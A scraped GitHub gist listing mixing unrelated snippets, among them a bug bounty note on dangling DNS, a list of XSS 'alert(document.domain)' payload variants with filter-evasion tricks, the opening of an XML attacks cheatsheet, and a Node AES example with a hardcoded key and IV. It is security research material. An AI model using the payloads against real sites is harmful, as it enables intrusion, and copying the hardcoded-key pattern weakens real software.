Skip to content

Instantly share code, notes, and snippets.

View rainb3rry's full-sized avatar
💃

rainb3rry

💃
23 followers · 136 following
  • Istanbul
View GitHub Profile
@TheBinitGhimire
TheBinitGhimire / README.md
Last active August 26, 2023 12:39
[Facebook Bug Bounty] Dangling DNS Records on surf-test.xwf.internet.org! - $500

Dangling DNS Records on surf-test.xwf.internet.org! - $500

Read the proper write-up here: https://publish.whoisbinit.me/amazon-ec2-dangling-dns-records-on-surf-test-xwf-internet-org!

Vulnerability Discovery

In this GitHub Gist, I have included my script (main.sh), which I used in discovering this vulnerability.

The script performs sub-domain enumeration over the Internet.org domain using assetfinder, subfinder, sublist3r and amass, and then checks for sub-domains which are further pointing to Amazon EC2 hostnames, and stores all of the results in multiple text files.

I didn't perform any form of manual work in discovering this vulnerability, and my workflow was fully automated with the help of Bash scripting using different tools.

@berkorbay
berkorbay / github_desktop_ubuntu.md
Last active April 25, 2024 01:56
To install Github Desktop for Ubuntu

IMPORTANT

See the following links for further updates to Github Desktop for Ubuntu. These are official instructions. (also mentioned by fetwar on Nov 3, 2023)

For the sake of "maintaining the tradition" here is the updated version.

@akhil-reni
akhil-reni / ssrf_iframe.svg
Created April 4, 2019 11:17
SVG Foreign Objects IFrame SSRF
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@luislobo14rap
luislobo14rap / unserialize.js
Last active December 5, 2022 14:18
// unserialize.js v1.0.1
function unserialize(serialize) {
let obj = {};
serialize = serialize.split('&');
for (let i = 0; i < serialize.length; i++) {
thisItem = serialize[i].split('=');
obj[decodeURIComponent(thisItem[0])] = decodeURIComponent(thisItem[1]);
};
return obj;
};
@tomnomnom
tomnomnom / alert.js
Last active April 23, 2024 20:42
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@sidneys
sidneys / youtube_format_code_itag_list.md
Created January 20, 2018 11:12
YouTube video stream format codes itags

YouTube video stream format codes

Comprehensive list of YouTube format code itags

itag Code Container Content Resolution Bitrate Range VR / 3D
5 flv audio/video 240p - - -
6 flv audio/video 270p - - -
17 3gp audio/video 144p - - -
18 mp4 audio/video 360p - - -
22 mp4 audio/video 720p - - -
@siwalikm
siwalikm / aes-256-cbc.js
Last active April 19, 2024 21:03
AES-256-CBC implementation in nodeJS with built-in Crypto library
'use strict';
const crypto = require('crypto');
const ENC_KEY = "bf3c199c2470cb477d907b1e0917c17b"; // set random encryption key
const IV = "5183666c72eec9e4"; // set random initialisation vector
// ENC_KEY and IV can be generated as crypto.randomBytes(32).toString('hex');
const phrase = "who let the dogs out";
var encrypt = ((val) => {
@Biostate
Biostate / iller.js
Created December 8, 2017 18:39
Türkiye iller ve ilçeleri Array
var iller = {
"Ankara": ["Altındağ", "Ayaş", "Bala", "Beypazarı", "Çamlıdere", "Çankaya", "Çubuk", "Etimesgut", "Haymana", "Kalecik", "Keçiören", "Kızılcahamam", "Mamak", "Nallıhan", "Polatlı", "Şereflikoçhisar", "Sincan", "Yenimahalle"],
"İstanbul": ["Adalar", "Bağcılar", "Bahçelievler", "Bakırköy", "Beşiktaş", "Beykoz", "Beyoğlu", "Büyükçekmece", "Çatalca", "Eminönü", "Esenler", "Eyüp", "Fatih", "Gaziosmanpaşa", "Güngören", "Kadıköy", "Kağıthane", "Kartal", "Küçükçekmece", "Maltepe", "Pendik", "Sarıyer", "Silivri", "Şile", "Şişli", "Sultanbeyli", "Tuzla", "Ümraniye", "Üsküdar", "Zeytinburnu"],
"İzmir": ["Aliağa", "Balçova", "Bayındır", "Bergama", "Beydağ", "Bornova", "Buca", "Çeşme", "Dikili", "Foça", "Güzelbahçe", "Karaburun", "Karşıyaka", "Kemalpaşa", "Kınık", "Kiraz", "Konak", "Menderes", "Menemen", "Narlıdere", "Ödemiş", "Seferihisar", "Selçuk", "Tire", "Torbalı", "Urla"],
"Adana": ["Aladağ", "Ceyhan", "Feke", "Karaisalı", "Kozan", "Pozantı", "Saimbeyli", "Seyhan", "Yumurtalı", "Yüreğir"
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@HassenIO
HassenIO / sha256.sh
Last active January 21, 2022 10:27
Get SHA256 of a text in Mac OSX terminal
# Get SHA256 of a text
# Usage: sha256 password
# output: 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
function sha256() {
echo -n $1 | shasum -a 256
# Source: http://albertech.blogspot.fr/2015/02/generate-sha-256-hash-from-command-line.html
}